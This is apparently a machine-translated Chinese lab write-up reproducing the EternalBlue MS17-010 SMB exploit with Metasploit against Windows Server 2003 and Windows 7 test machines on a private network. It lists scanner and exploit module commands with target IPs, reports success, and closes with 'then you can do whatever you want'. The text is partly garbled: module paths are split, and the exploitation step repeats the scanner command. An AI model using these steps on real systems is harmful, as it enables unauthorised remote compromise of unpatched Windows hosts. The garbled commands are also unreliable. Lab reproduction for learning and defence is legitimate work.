文章目录介绍:预计开始再现并正式开始使用
介绍:
永恒的蓝色是黑客集团的Shadow Brokers发布的大量网络攻击工具,其中包含“永恒的蓝色”工具。 “永远的蓝色”利用Windows系统的中小企业漏洞获得系统的最高权限。
恶意代码扫描打开445个文件共享端口的Windows计算机。 不需要用户操作,只要打开电源连接到互联网,就可以进行非法操作。
1 .准备1.kali的ip:192.168.0.128
2.WindowsServer2003的ip:192.168.0.200
3 .连接性测试:
再现1.kali进入msf。 命令: MSF控制台
2.search ms17-010 #搜索ms17010
使用use auxiliary/scanner/SMB/SMB _ ms17 _ 010 #模块显示选项
set RHOSTS 192.168.0.200 #目标主机设置
输入run或exploit发现漏洞3 .使用exploit/windows/SMB/ms17 _ 010 _ eternal blue模块进行漏洞攻击
执行use exploit/windows/SMB/ms17 _ 010 _ eternalbluesetrhosts 192.168.0.200 #被攻击方IPrun #
我们发现此exp只能对64位系统执行攻击。 肮脏!
来吧,我们再来。
win7ip:192.168.0.129
测试连通也没问题
正式使用use auxiliary/scanner/SMB/SMB _ ms17 _ 010 #使用模块
设置rhosts 192.168.0.129 #目标IP
运行
发现了漏洞。
2 .利用漏洞use auxiliary/scanner/SMB/SMB _ ms17 _ 010 set rhosts 192.168.0.129 run
发现攻击成功了。
然后可以做想做的事。
发现乱码了。 可以使用chcp 65001命令消除乱码。
再现到此结束。